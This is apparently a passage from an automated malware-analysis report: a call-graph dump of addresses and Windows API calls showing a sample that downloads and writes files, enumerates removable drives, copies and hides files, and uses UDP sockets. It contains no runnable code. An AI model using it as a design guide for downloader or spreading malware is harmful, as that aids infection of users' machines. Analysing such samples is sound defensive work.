calls 4685->4676 4802 409d10 4686->4802 4690 4024e0 10 API calls 4689->4690 4691 40c3a4 4690->4691 4700 4026f0 4691->4700 4693 40c3bc 4693->4680 4695 4024ce 4694->4695 4698 402484 _invalid_parameter 4694->4698 4695->4685 4696 4024ac 4697 40a1b0 _invalid_parameter 3 API calls 4696->4697 4697->4695 4698->4696 4699 40a1b0 _invalid_parameter 3 API calls 4698->4699 4699->4696 4703 402710 4700->4703 4702 40270a 4702->4693 4704 402724 4703->4704 4705 402540 __aligned_recalloc_base 10 API calls 4704->4705 4706 40276d 4705->4706 4707 402540 __aligned_recalloc_base 10 API calls 4706->4707 4708 40277d 4707->4708 4709 402540 __aligned_recalloc_base 10 API calls 4708->4709 4710 40278d 4709->4710 4711 402540 __aligned_recalloc_base 10 API calls 4710->4711 4712 40279d 4711->4712 4713 4027a6 4712->4713 4714 4027cf 4712->4714 4718 403e20 4713->4718 4735 403df0 4714->4735 4717 4027c7 __aligned_recalloc_base 4717->4702 4719 402820 _invalid_parameter 7 API calls 4718->4719 4720 403e37 4719->4720 4721 402820 _invalid_parameter 7 API calls 4720->4721 4722 403e46 4721->4722 4723 402820 _invalid_parameter 7 API calls 4722->4723 4724 403e55 4723->4724 4725 402820 _invalid_parameter 7 API calls 4724->4725 4734 403e64 _invalid_parameter __aligned_recalloc_base 4725->4734 4727 40400f _invalid_parameter 4728 402850 _invalid_parameter 3 API calls 4727->4728 4729 404035 _invalid_parameter 4727->4729 4728->4727 4730 402850 _invalid_parameter 3 API calls 4729->4730 4731 40405b _invalid_parameter 4729->4731 4730->4729 4732 402850 _invalid_parameter 3 API calls 4731->4732 4733 404081 4731->4733 4732->4731 4733->4717 4734->4727 4738 402850 4734->4738 4742 404090 4735->4742 4737 403e0c 4737->4717 4739 402866 4738->4739 4740 40285b 4738->4740 4739->4734 4741 40a1b0 _invalid_parameter 3 API calls 4740->4741 4741->4739 4743 4040a6 _invalid_parameter 4742->4743 4744 4040b8 _invalid_parameter 4743->4744 4745 4040dd 4743->4745 4747 404103 4743->4747 4744->4737 4772 403ca0 4745->4772 4748 40413d 4747->4748 4749 40415e 4747->4749 4782 404680 4748->4782 4751 402820 _invalid_parameter 7 API calls 4749->4751 4752 40416f 4751->4752 4753 402820 _invalid_parameter 7 API calls 4752->4753 4754 40417e 4753->4754 4755 402820 _invalid_parameter 7 API calls 4754->4755 4756 40418d 4755->4756 4757 402820 _invalid_parameter 7 API calls 4756->4757 4758 40419c 4757->4758 4795 403d70 4758->4795 4760 402820 _invalid_parameter 7 API calls 4761 4041ca _invalid_parameter 4760->4761 4761->4760 4762 404284 _invalid_parameter __aligned_recalloc_base 4761->4762 4763 402850 _invalid_parameter 3 API calls 4762->4763 4764 4045a3 _invalid_parameter 4762->4764 4763->4762 4765 402850 _invalid_parameter 3 API calls 4764->4765 4766 4045c9 _invalid_parameter 4764->4766 4765->4764 4767 402850 _invalid_parameter 3 API calls 4766->4767 4768 4045ef _invalid_parameter 4766->4768 4767->4766 4769 402850 _invalid_parameter 3 API calls 4768->4769 4770 404615 _invalid_parameter 4768->4770 4769->4768 4770->4744 4771 402850 _invalid_parameter 3 API calls 4770->4771 4771->4770 4773 403cae 4772->4773 4774 402820 _invalid_parameter 7 API calls 4773->4774 4775 403ccb 4774->4775 4776 402820 _invalid_parameter 7 API calls 4775->4776 4777 403cda _invalid_parameter 4776->4777 4778 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4777->4778 4779 403d3a _invalid_parameter 4777->4779 4778->4777 4780 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4779->4780 4781 403d60 4779->4781 4780->4779 4781->4744 4783 402820 _invalid_parameter 7 API calls 4782->4783 4784 404697 4783->4784 4785 402820 _invalid_parameter 7 API calls 4784->4785 4786 4046a6 4785->4786 4787 402820 _invalid_parameter 7 API calls 4786->4787 4788 4046b5 _invalid_parameter __aligned_recalloc_base 4787->4788 4789 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4788->4789 4790 404841 _invalid_parameter 4788->4790 4789->4788 4791 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4790->4791 4792 404867 _invalid_parameter 4790->4792 4791->4790 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4792->4793 4794 40488d 4792->4794 4793->4792 4794->4744 4796 402820 _invalid_parameter 7 API calls 4795->4796 4797 403d7f _invalid_parameter 4796->4797 4798 403ca0 _invalid_parameter 9 API calls 4797->4798 4799 403db8 _invalid_parameter 4798->4799 4800 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4799->4800 4801 403de3 4799->4801 4800->4799 4801->4761 4803 409d22 4802->4803 4806 409c70 4803->4806 4807 409fa0 __aligned_recalloc_base 7 API calls 4806->4807 4812 409c80 4807->4812 4808 407b0f 4808->4666 4810 409cbc 4813 40a1b0 _invalid_parameter 3 API calls 4810->4813 4812->4808 4812->4810 4815 4091a0 4812->4815 4822 409790 4812->4822 4827 409b60 4812->4827 4813->4808 4816 4091b3 4815->4816 4821 4091a9 4815->4821 4817 4091f6 memset 4816->4817 4816->4821 4818 409217 4817->4818 4817->4821 4819 40921d memcpy 4818->4819 4818->4821 4835 408f70 4819->4835 4821->4812 4823 40979d 4822->4823 4824 4097a7 4822->4824 4823->4812 4824->4823 4825 40989f memcpy 4824->4825 4840 4094c0 4824->4840 4825->4824 4828 409b6c 4827->4828 4831 409b76 4827->4831 4828->4812 4829 4094c0 64 API calls 4830 409bf7 4829->4830 4830->4828 4832 408f70 6 API calls 4830->4832 4831->4828 4831->4829 4833 409c16 4832->4833 4833->4828 4834 409c2b memcpy 4833->4834 4834->4828 4836 408fbe 4835->4836 4838 408f7e 4835->4838 4836->4821 4838->4836 4839 408eb0 6 API calls 4838->4839 4839->4838 4841 4094d0 4840->4841 4843 4094da 4840->4843 4841->4824 4843->4841 4850 409300 4843->4850 4845 409618 memcpy 4845->4841 4847 409637 memcpy 4848 409761 4847->4848 4849 4094c0 62 API calls 4848->4849 4849->4841 4851 40930d 4850->4851 4852 409317 4850->4852 4851->4841 4851->4845 4851->4847 4852->4851 4853 4093a0 4852->4853 4854 4093a5 4852->4854 4855 409388 4852->4855 4861 408c60 4853->4861 4858 408f70 6 API calls 4854->4858 4857 408f70 6 API calls 4855->4857 4857->4853 4858->4853 4860 40944c memset 4860->4851 4862 408c6f 4861->4862 4863 408c79 4861->4863 4862->4851 4862->4860 4863->4862 4864 408b30 9 API calls 4863->4864 4865 408d72 4864->4865 4866 409fa0 __aligned_recalloc_base 7 API calls 4865->4866 4867 408dc1 4866->4867 4867->4862 4868 4089a0 46 API calls 4867->4868 4869 408dee 4868->4869 4870 40a1b0 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4869->4870 4870->4862 4890 409e50 GetCurrentProcessId 4871->4890 4873 409feb 4874 409e70 __aligned_recalloc_base 5 API calls 4873->4874 4878 409ff7 __aligned_recalloc_base 4873->4878 4874->4878 4875 40a0f0 _invalid_parameter HeapValidate 4875->4878 4876 40a0a0 HeapAlloc 4876->4878 4877 40a06a HeapReAlloc 4877->4878 4878->4875 4878->4876 4878->4877 4879 40a1b0 _invalid_parameter 3 API calls 4878->4879 4880 405d15 4878->4880 4879->4878 4880->4651 4880->4656 4883 40c19b 4881->4883 4882 409fa0 __aligned_recalloc_base 7 API calls 4882->4883 4883->4882 4884 405dad 4883->4884 4884->4656 4885 407310 4884->4885 4886 409fa0 __aligned_recalloc_base 7 API calls 4885->4886 4887 407320 4886->4887 4888 407367 4887->4888 4889 40732c memcpy CreateThread 4887->4889 4888->4656 4889->4888 4891 407370 GetTickCount srand rand Sleep 4889->4891 4890->4873 4892 4073a7 4891->4892 4893 4073fd 4891->4893 4896 4073b6 StrChrA 4892->4896 4897 4073fb 4892->4897 4901 40eae0 9 API calls 4892->4901 4894 40eae0 56 API calls 4893->4894 4893->4897 4894->4897 4895 40a1b0 _invalid_parameter 3 API calls 4898 407428 4895->4898 4896->4892 4897->4895 4902 40ed03 InternetCloseHandle Sleep 4901->4902 4903 40eba3 InternetOpenUrlW 4901->4903 4906 40ed2a 6 API calls 4902->4906 4923 4073e5 Sleep 4902->4923 4904 40ebd2 CreateFileW 4903->4904 4905 40ecf6 InternetCloseHandle 4903->4905 4908 40ec01 InternetReadFile 4904->4908 4927 40ecd3 4904->4927 4905->4902 4907 40eda6 wsprintfW DeleteFileW 4906->4907 4906->4923 4909 40e7c0 18 API calls 4907->4909 4910 40ec54 wsprintfW DeleteFileW 4908->4910 4911 40ec25 4908->4911 4912 40eddb 4909->4912 4929 40e7c0 CreateFileW 4910->4929 4911->4910 4913 40ec2e WriteFile 4911->4913 4915 40ede5 Sleep 4912->4915 4916 40ee19 DeleteFileW 4912->4916 4913->4908 4918 40e980 6 API calls 4915->4918 4916->4923 4920 40edfc 4918->4920 4920->4923 4925 40ee0f ExitProcess 4920->4925 4921 40eca0 Sleep 4924 40e980 6 API calls 4921->4924 4922 40ecdc DeleteFileW 4922->4927 4923->4892 4926 40ecb7 4924->4926 4926->4927 4928 40eccb ExitProcess 4926->4928 4927->4905 4930 40e805 CreateFileMappingW 4929->4930 4931 40e906 4929->4931 4930->4931 4932 40e826 MapViewOfFile 4930->4932 4933 40e920 CreateFileW 4931->4933 4941 40e971 4931->4941 4932->4931 4934 40e845 GetFileSize 4932->4934 4935 40e942 WriteFile 4933->4935 4936 40e968 4933->4936 4937 40e861 4934->4937 4938 40e8fc UnmapViewOfFile 4934->4938 4935->4936 4939 40a1b0 _invalid_parameter 3 API calls 4936->4939 4949 40c7f0 4937->4949 4938->4931 4939->4941 4941->4921 4941->4922 4943 40c190 7 API calls 4944 40e8b0 4943->4944 4944->4938 4945 40e8cd memcmp 4944->4945 4945->4938 4946 40e8e9 4945->4946 4947 40a1b0 _invalid_parameter 3 API calls 4946->4947 4948 40e8f2 4947->4948 4948->4938 4950 40c220 10 API calls 4949->4950 4951 40c814 4950->4951 4951->4938 4951->4943 4953 40d73d htons inet_addr setsockopt 4952->4953 4958 40d86e 4952->4958 4954 40aa80 8 API calls 4953->4954 4955 40d7b6 bind lstrlenA sendto ioctlsocket 4954->4955 4961 40d80b 4955->4961 4958->4437 4959 40d832 5009 40ab40 shutdown closesocket 4959->5009 4960 409fe0 9 API calls 4960->4961 4961->4959 4961->4960 5000 40d890 4961->5000 5016 40dbc0 memset InternetCrackUrlA InternetOpenA 4962->5016 4966 40a1b0 _invalid_parameter 3 API calls 4967 40da9e 4966->4967 4967->4437 4968 40da6b 4968->4966 4974 40da61 SysFreeString 4974->4968 5123 40aa40 inet_addr 4977->5123 4980 40ab2d 4985 40e470 4980->4985 4981 40aadc connect 4982 40aaf0 getsockname 4981->4982 4983 40ab24 4981->4983 4982->4983 5126 40ab40 shutdown closesocket 4983->5126 5127 40aa20 inet_ntoa 4985->5127 4987 40e486 4988 40c9f0 11 API calls 4987->4988 4989 40e4a5 4988->4989 4990 40d6cc 4989->4990 5128 40e4f0 memset InternetCrackUrlA InternetOpenA 4989->5128 4990->4445 4993 40e4dc 4995 40a1b0 _invalid_parameter 3 API calls 4993->4995 4994 40a1b0 _invalid_parameter 3 API calls 4994->4993 4995->4990 4999 40a2d4 4996->4999 4997 40a2da 4997->4436 4998 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 4998->4999 4999->4997 4999->4998 5005 40d8ac 5000->5005 5001 40d974 5001->4961 5002 40d8c8 recvfrom 5003 40d8f6 StrCmpNIA 5002->5003 5004 40d8e9 Sleep 5002->5004 5003->5005 5006 40d915 StrStrIA 5003->5006 5004->5005 5005->5001 5005->5002 5006->5005 5007 40d936 StrChrA 5006->5007 5010 40c8a0 5007->5010 5009->4958 5011 40c8ab 5010->5011 5012 40c8b1 lstrlenA 5011->5012 5013 409fa0 __aligned_recalloc_base 7 API calls 5011->5013 5014 40c8e0 memcpy 5011->5014 5015 40c8c4 5011->5015 5012->5011 5012->5015 5013->5011 5014->5011 5014->5015 5015->5005 5017 40dc61 InternetConnectA 5016->5017 5018 40d99a 5016->5018 5019 40ddca InternetCloseHandle 5017->5019 5020 40dc9a HttpOpenRequestA 5017->5020 5018->4967 5029 40dab0 5018->5029 5019->5018 5021 40dcd0 HttpSendRequestA 5020->5021 5022 40ddbd InternetCloseHandle 5020->5022 5023 40ddb0 InternetCloseHandle 5021->5023 5025 40dced 5021->5025 5022->5019 5023->5022 5024 40dd0e InternetReadFile 5024->5025 5026 40dd3b 5024->5026 5025->5024 5025->5026 5027 409fe0 9 API calls 5025->5027 5026->5023 5028 40dd56 memcpy 5027->5028 5028->5025 5058 405690 5029->5058 5032 40d9b3 5032->4968 5039 40e420 5032->5039 5033 40dada SysAllocString 5034 40daf1 CoCreateInstance 5033->5034 5035 40dba7 5033->5035 5036 40db9d SysFreeString 5034->5036 5038 40db16 5034->5038 5037 40a1b0 _invalid_parameter 3 API calls 5035->5037 5036->5035 5037->5032 5038->5036 5075 40df70 5039->5075 5042 40ddf0 5080 40e240 5042->5080 5047 40e3a0 6 API calls 5048 40de47 5047->5048 5054 40da32 5048->5054 5097 40e060 5048->5097 5051 40de7f 5051->5054 5102 40df10 5051->5102 5052 40e060 6 API calls 5052->5051 5054->4974 5055 40c9f0 5054->5055 5118 40c960 5055->5118 5063 40569d 5058->5063 5059 4056a3 lstrlenA 5059->5063 5064 4056b6 5059->5064 5061 409fa0 __aligned_recalloc_base 7 API calls 5061->5063 5063->5059 5063->5061 5063->5064 5065 40a1b0 _invalid_parameter 3 API calls 5063->5065 5066 405630 5063->5066 5070 4055e0 5063->5070 5064->5032 5064->5033 5065->5063 5067 405647 MultiByteToWideChar 5066->5067 5068 40563a lstrlenA 5066->5068 5069 40566c 5067->5069 5068->5067 5069->5063 5073 4055eb 5070->5073 5071 4055f1 lstrlenA 5071->5073 5072 405630 2 API calls 5072->5073 5073->5071 5073->5072 5074 405627 5073->5074 5074->5063 5078 40df96 5075->5078 5076 40da1d 5076->4968 5076->5042 5077 40e013 lstrcmpiW 5077->5078 5079 40e02b SysFreeString 5077->5079 5078->5076 5078->5077 5078->5079 5079->5078 5082 40e266 5080->5082 5081 40de0b 5081->5054 5092 40e3a0 5081->5092 5082->5081 5083 40e2f3 lstrcmpiW 5082->5083 5084 40e373 SysFreeString 5083->5084 5085 40e306 5083->5085 5084->5081 5086 40df10 2 API calls 5085->5086 5087 40e314 5086->5087 5087->5084 5088 40e365 5087->5088 5089 40e343 lstrcmpiW 5087->5089 5088->5084 5090 40e355 5089->5090 5091 40e35b SysFreeString 5089->5091 5090->5091 5091->5088 5093 40df10 2 API calls 5092->5093 5095 40e3bb 5093->5095 5094 40de29 5094->5047 5094->5054 5095->5094 5096 40e240 6 API calls 5095->5096 5096->5094 5098 40df10 2 API calls 5097->5098 5100 40e07b 5098->5100 5099 40de65 5099->5051 5099->5052 5100->5099 5106 40e0e0 5100->5106 5103 40df36 5102->5103 5104 40df70 2 API calls 5103->5104 5105 40df4d 5103->5105 5104->5105 5105->5054 5107 40e106 5106->5107 5108 40e21d 5107->5108 5109 40e193 lstrcmpiW 5107->5109 5108->5099 5110 40e213 SysFreeString 5109->5110 5111 40e1a6 5109->5111 5110->5108 5112 40df10 2 API calls 5111->5112 5114 40e1b4 5112->5114 5113 40e205 5113->5110 5114->5110 5114->5113 5115 40e1e3 lstrcmpiW 5114->5115 5116 40e1f5 5115->5116 5117 40e1fb SysFreeString 5115->5117 5116->5117 5117->5113 5120 40c96d 5118->5120 5119 40c910 _vscprintf wvsprintfA 5119->5120 5120->5119 5121 409fe0 9 API calls 5120->5121 5122 40c988 SysFreeString 5120->5122 5121->5120 5122->4974 5124 40aa6c socket 5123->5124 5125 40aa59 gethostbyname 5123->5125 5124->4980 5124->4981 5125->5124 5126->4980 5127->4987 5129 40e4c7 5128->5129 5130 40e594 InternetConnectA 5128->5130 5129->4993 5129->4994 5131 40e714 InternetCloseHandle 5130->5131 5132 40e5cd HttpOpenRequestA 5130->5132 5131->5129 5133 40e603 HttpAddRequestHeadersA HttpSendRequestA 5132->5133 5134 40e707 InternetCloseHandle 5132->5134 5135 40e6fa InternetCloseHandle 5133->5135 5138 40e64d 5133->5138 5134->5131 5135->5134 5136 40e664 InternetReadFile 5137 40e691 5136->5137 5136->5138 5137->5135 5138->5136 5138->5137 5139 409fe0 9 API calls 5138->5139 5140 40e6ac memcpy 5139->5140 5140->5138 5146 407067 5141->5146 5142 40723b 5144 407244 SysFreeString 5142->5144 5145 40700b SysFreeString 5142->5145 5143 40a1b0 _invalid_parameter 3 API calls 5143->5142 5144->5145 5145->4449 5147 4072c0 CoCreateInstance 5146->5147 5148 4071b6 SysAllocString 5146->5148 5149 407082 5146->5149 5147->5146 5148->5146 5148->5149 5149->5142 5149->5143 5151 40beca 5150->5151 5152 40bece 5150->5152 5151->4455 5154 40be80 CryptAcquireContextW 5152->5154 5155 40bebb 5154->5155 5156 40be9d CryptGenRandom CryptReleaseContext 5154->5156 5155->5151 5156->5155 5157->4471 5209 40add0 gethostname 5158->5209 5161 40aeb9 5161->4471 5163 40aecc strcmp 5163->5161 5164 40aee1 5163->5164 5213 40aa20 inet_ntoa 5164->5213 5166 40aeef strstr 5167 40af40 5166->5167 5168 40aeff 5166->5168 5216 40aa20 inet_ntoa 5167->5216 5214 40aa20 inet_ntoa 5168->5214 5171 40af0d strstr 5171->5161 5173 40af1d 5171->5173 5172 40af4e strstr 5174 40af5e 5172->5174 5175 40af9f 5172->5175 5215 40aa20 inet_ntoa 5173->5215 5217 40aa20 inet_ntoa 5174->5217 5219 40aa20 inet_ntoa 5175->5219 5179 40af6c strstr 5179->5161 5182 40af7c 5179->5182 5180 40afad strstr 5183 40afbd 5180->5183 5184 40affe EnterCriticalSection 5180->5184 5181 40af2b strstr 5181->5161 5181->5167 5218 40aa20 inet_ntoa 5182->5218 5220 40aa20 inet_ntoa 5183->5220 5185 40b016 5184->5185 5194 40b041 5185->5194 5222 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5185->5222 5188 40af8a strstr 5188->5161 5188->5175 5189 40afcb strstr 5189->5161 5190 40afdb 5189->5190 5221 40aa20 inet_ntoa 5190->5221 5193 40b13a LeaveCriticalSection 5193->5161 5194->5193 5196 409d90 7 API calls 5194->5196 5195 40afe9 strstr 5195->5161 5195->5184 5197 40b085 5196->5197 5197->5193 5223 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5197->5223 5199 40b0a3 5200 40b0d0 5199->5200 5201 40b0c6 Sleep 5199->5201 5203 40b0f5 5199->5203 5202 40a1b0 _invalid_parameter 3 API calls 5200->5202 5201->5199 5202->5203 5203->5193 5224 40ab80 5203->5224 5205->4481 5207 40ab80 13 API calls 5206->5207 5208 40ab73 LeaveCriticalSection 5207->5208 5208->4476 5210 40adf7 gethostbyname 5209->5210 5211 40ae13 5209->5211 5210->5211 5211->5161 5212 40aa20 inet_ntoa 5211->5212 5212->5163 5213->5166 5214->5171 5215->5181 5216->5172 5217->5179 5218->5188 5219->5180 5220->5189 5221->5195 5222->5194 5223->5199 5225 40ab94 5224->5225 5232 40ab8f 5224->5232 5226 409fa0 __aligned_recalloc_base 7 API calls 5225->5226 5228 40aba8 5226->5228 5227 40ac04 CreateFileW 5229 40ac53 InterlockedExchange 5227->5229 5230 40ac27 WriteFile FlushFileBuffers 5227->5230 5228->5227 5228->5232 5231 40a1b0 _invalid_parameter 3 API calls 5229->5231 5230->5229 5231->5232 5232->5193 5234 40d25d 5233->5234 5235 40d193 5234->5235 5236 40d281 WaitForSingleObject 5234->5236 5235->4488 5235->4489 5236->5234 5242 407490 5237->5242 5238 4074b8 Sleep 5238->5242 5239 40756a Sleep 5239->5242 5240 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5267 40ea30 InternetOpenA 5240->5267 5242->5238 5242->5239 5242->5240 5243 40eae0 56 API calls 5242->5243 5243->5242 5245 405889 memset GetModuleHandleW 5244->5245 5246 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5245->5246 5246->5246 5247 405900 CreateWindowExW 5246->5247 5248 40592b 5247->5248 5249 40592d GetMessageA 5247->5249 5250 40595f ExitThread 5248->5250 5251 405941 TranslateMessage DispatchMessageA 5249->5251 5252 405957 5249->5252 5251->5249 5252->5245 5252->5250 5274 40e770 CreateFileW 5253->5274 5255 406d48 ExitThread 5257 406bf0 5257->5255 5258 406d38 Sleep 5257->5258 5259 406c29 5257->5259 5277 4063a0 GetLogicalDrives 5257->5277 5258->5257 5283 4062c0 5259->5283 5262 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5263 406cd6 wsprintfW 5262->5263 5264 406ceb wsprintfW 5262->5264 5263->5264 5289 4066b0 _chkstk 5264->5289 5266 406c5b 5268 40ea56 InternetOpenUrlA 5267->5268 5269 40eac8 Sleep 5267->5269 5270 40ea75 HttpQueryInfoA 5268->5270 5271 40eabe InternetCloseHandle 5268->5271 5269->5242 5272 40eab4 InternetCloseHandle 5270->5272 5273 40ea9e 5270->5273 5271->5269 5272->5271 5273->5272 5275 40e7b8 5274->5275 5276 40e79f GetFileSize 5274->5276 5275->5257 5276->5275 5282 4063cd 5277->5282 5278 406446 5278->5257 5279 4063dc RegOpenKeyExW 5280 4063fe RegQueryValueExW 5279->5280 5279->5282 5281 40643a RegCloseKey 5280->5281 5280->5282 5281->5282 5282->5278 5282->5279 5282->5281 5284 406319 5283->5284 5285 4062dc 5283->5285 5284->5262 5284->5266 5326 406320 GetDriveTypeW 5285->5326 5288 40630b lstrcpyW 5288->5284 5290 4066ce 6 API calls 5289->5290 5302 4066c7 5289->5302 5291 406782 5290->5291 5292 4067c4 PathFileExistsW 5290->5292 5295 40e770 2 API calls 5291->5295 5293 406874 PathFileExistsW 5292->5293 5294 4067d9 PathFileExistsW 5292->5294 5298 406885 5293->5298 5299 4068ca FindFirstFileW 5293->5299 5296 406809 PathFileExistsW 5294->5296 5297 4067ea SetFileAttributesW DeleteFileW 5294->5297 5300 40678e 5295->5300 5303 40681a CreateDirectoryW 5296->5303 5304 40683c PathFileExistsW 5296->5304 5297->5296 5305 4068a5 5298->5305 5306 40688d 5298->5306 5299->5302 5324 4068f1 5299->5324 5300->5292 5301 4067a5 SetFileAttributesW DeleteFileW 5300->5301 5301->5292 5302->5266 5303->5304 5309 40682d SetFileAttributesW 5303->5309 5304->5293 5310 40684d CopyFileW 5304->5310 5307 406460 3 API calls 5305->5307 5331 406460 CoInitialize CoCreateInstance 5306->5331 5312 4068a0 SetFileAttributesW 5307->5312 5308 4069b3 lstrcmpW 5313 4069c9 lstrcmpW 5308->5313 5308->5324 5309->5304 5310->5293 5314 406865 SetFileAttributesW 5310->5314 5312->5299 5313->5324 5314->5293 5316 406b8a FindNextFileW 5316->5308 5317 406ba6 FindClose 5316->5317 5317->5302 5318 406a0f lstrcmpiW 5318->5324 5319 406a76 PathMatchSpecW 5321 406a97 wsprintfW SetFileAttributesW DeleteFileW 5319->5321 5319->5324 5320 406af4 PathFileExistsW 5322 406b0a wsprintfW wsprintfW 5320->5322 5320->5324 5321->5324 5323 406b74 MoveFileExW 5322->5323 5322->5324 5323->5316 5324->5308 5324->5316 5324->5318 5324->5319 5324->5320 5335 406570 CreateDirectoryW wsprintfW FindFirstFileW 5324->5335 5327 4062ff 5326->5327 5328 406348 5326->5328 5327->5284 5327->5288 5328->5327 5329 40635c QueryDosDeviceW 5328->5329 5329->5327 5330 406376 StrCmpNW 5329->5330 5330->5327 5332 406496 5331->5332 5334 4064d2 5331->5334 5333 4064a0 wsprintfW 5332->5333 5332->5334 5333->5334 5334->5312 5336 4065c5 lstrcmpW 5335->5336 5337 40669f 5335->5337 5338 4065f1 5336->5338 5339 4065db lstrcmpW 5336->5339 5337->5324 5341 40666c FindNextFileW 5338->5341 5339->5338 5340 4065f3 wsprintfW wsprintfW 5339->5340 5340->5338 5342 406656 MoveFileExW 5340->5342 5341->5336 5343 406688 FindClose RemoveDirectoryW 5341->5343 5342->5341 5343->5337 5353 40d0d0 5358 401b60 5353->5358 5355 40d0e5 5356 40d104 5355->5356 5357 401b60 16 API calls 5355->5357 5357->5356 5359 401c42 5358->5359 5360 401b70 5358->5360 5359->5355 5360->5359 5361 409d90 7 API calls 5360->5361 5362 401b9d 5361->5362 5362->5359 5363 40a220 8 API calls 5362->5363 5364 401bc9 5363->5364 5365 401be6 5364->5365 5366 401bd6 5364->5366 5378 401ae0 WSASend 5365->5378 5368 40a1b0 _invalid_parameter 3 API calls 5366->5368 5369 401bdc 5368->5369 5369->5355 5370 401bf3 5371 401c33 5370->5371 5372 401bfc EnterCriticalSection 5370->5372 5375 40a1b0 _invalid_parameter 3 API calls 5371->5375 5373 401c13 5372->5373 5374 401c1f LeaveCriticalSection 5372->5374 5373->5374 5374->5355 5376 401c3c 5375->5376 5377 40a1b0 _invalid_parameter 3 API calls 5376->5377 5377->5359 5379 401b50 5378->5379 5380 401b12 WSAGetLastError 5378->5380 5379->5370 5380->5379 5381 401b1f 5380->5381 5382 401b56 5381->5382 5383 401b26 Sleep WSASend 5381->5383 5382->5370 5383->5379 5383->5380 5384 40d4d0 5387 40b570 5384->5387 5395 40b581 5387->5395 5389 40b59f 5391 40a1b0 _invalid_parameter 3 API calls 5389->5391 5392 40b94f 5391->5392 5393 40b960 21 API calls 5393->5395 5395->5389 5395->5393 5397 40b520 13 API calls 5395->5397 5398 40ae80 31 API calls 5395->5398 5401 40bab0 5395->5401 5408 40b250 EnterCriticalSection 5395->5408 5413 406e90 5395->5413 5418 406f30 5395->5418 5423 406d60 5395->5423 5430 406e60 5395->5430 5397->5395 5398->5395 5402 40bac1 lstrlenA 5401->5402 5403 40c190 7 API calls 5402->5403 5407 40badf 5403->5407 5404 40baeb 5405 40bb6f 5404->5405 5406 40a1b0 _invalid_parameter 3 API calls 5404->5406 5405->5395 5406->5405 5407->5402 5407->5404 5409 40b268 5408->5409 5410 40b2a4 LeaveCriticalSection 5409->5410 5433 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5409->5433 5410->5395 5412 40b293 5412->5410 5434 406ed0 5413->5434 5416 40d160 16 API calls 5417 406ec9 5416->5417 5417->5395 5419 406ed0 75 API calls 5418->5419 5420 406f4f 5419->5420 5421 406f7c 5420->5421 5449 406f90 5420->5449 5421->5395 5460 405fa0 EnterCriticalSection 5423->5460 5425 406dad 5425->5395 5426 406d7a 5426->5425 5465 406dc0 5426->5465 5429 40a1b0 _invalid_parameter 3 API calls 5429->5425 5472 406060 EnterCriticalSection 5430->5472 5432 406e82 5432->5395 5433->5412 5435 406ee3 5434->5435 5437 406ea4 5435->5437 5438 405eb0 EnterCriticalSection 5435->5438 5437->5416 5437->5417 5439 40c820 71 API calls 5438->5439 5440 405ece 5439->5440 5441 405f8b LeaveCriticalSection 5440->5441 5442 405ee7 5440->5442 5444 405f08 5440->5444 5441->5435 5443 405ef1 memcpy 5442->5443 5448 405f06 5442->5448 5443->5448 5447 405f66 memcpy 5444->5447 5444->5448 5445 40a1b0 _invalid_parameter 3 API calls 5446 405f88 5445->5446 5446->5441 5447->5448 5448->5445 5452 40b480 5449->5452 5453 40bf00 3 API calls 5452->5453 5454 40b48b 5453->5454 5455 40b4a7 lstrlenA 5454->5455 5456 40c190 7 API calls 5455->5456 5458 40b4dd 5456->5458 5457 406fd5 5457->5421 5458->5457 5459 40a1b0 _invalid_parameter 3 API calls 5458->5459 5459->5457 5461 405fbe 5460->5461 5462 40604a LeaveCriticalSection 5461->5462 5463 40a220 8 API calls 5461->5463 5462->5426 5464 40601c 5463->5464 5464->5462 5466 409fa0 __aligned_recalloc_base 7 API calls 5465->5466 5467 406dd2 memcpy 5466->5467 5468 40b480 13 API calls 5467->5468 5469 406e3c 5468->5469 5470 40a1b0 _invalid_parameter 3 API calls 5469->5470 5471 406da1 5470->5471 5471->5429 5497 40c880 5472->5497 5475 4062a3 LeaveCriticalSection 5475->5432 5476 40c820 71 API calls 5477 406099 5476->5477 5477->5475 5478 4061b8 5477->5478 5479 4060f4 memcpy 5477->5479 5480 4061e1 5478->5480 5481 405cf0 68 API calls 5478->5481 5482 40a1b0 _invalid_parameter 3 API calls 5479->5482 5483 40a1b0 _invalid_parameter 3 API calls 5480->5483 5481->5480 5484 406118 5482->5484 5485 406202 5483->5485 5486 40a220 8 API calls 5484->5486 5485->5475 5487 406211 CreateFileW 5485->5487 5488 406128 5486->5488 5487->5475 5489 406234 5487->5489 5490 40a1b0 _invalid_parameter 3 API calls 5488->5490 5492 406251 WriteFile 5489->5492 5493 40628f FlushFileBuffers 5489->5493 5491 40614f 5490->5491 5494 40c190 7 API calls 5491->5494 5492->5489 5493->5475 5495 406185 5494->5495 5496 407310 64 API calls 5495->5496 5496->5478 5500 40bdd0 5497->5500 5505 40bde1 5500->5505 5501 40a220 8 API calls 5501->5505 5502 40bd30 70 API calls 5502->5505 5503 40a1b0 _invalid_parameter 3 API calls 5504 406082 5503->5504 5504->5475 5504->5476 5505->5501 5505->5502 5506 407af0 68 API calls 5505->5506 5507 40bdfb 5505->5507 5508 40be3b memcmp 5505->5508 5506->5505 5507->5503 5508->5505 5508->5507 5509 40cf50 5510 40cfbe 5509->5510 5511 40cf66 5509->5511 5511->5510 5512 40cf70 5511->5512 5513 40cfc3 5511->5513 5514 40d013 5511->5514 5515 409d90 7 API calls 5512->5515 5517 40cfe8 5513->5517 5518 40cfdb InterlockedDecrement 5513->5518 5543 40bbc0 5514->5543 5519 40cf7d 5515->5519 5520 40a1b0 _invalid_parameter 3 API calls 5517->5520 5518->5517 5532 4023d0 5519->5532 5522 40cff4 5520->5522 5524 40a1b0 _invalid_parameter 3 API calls 5522->5524 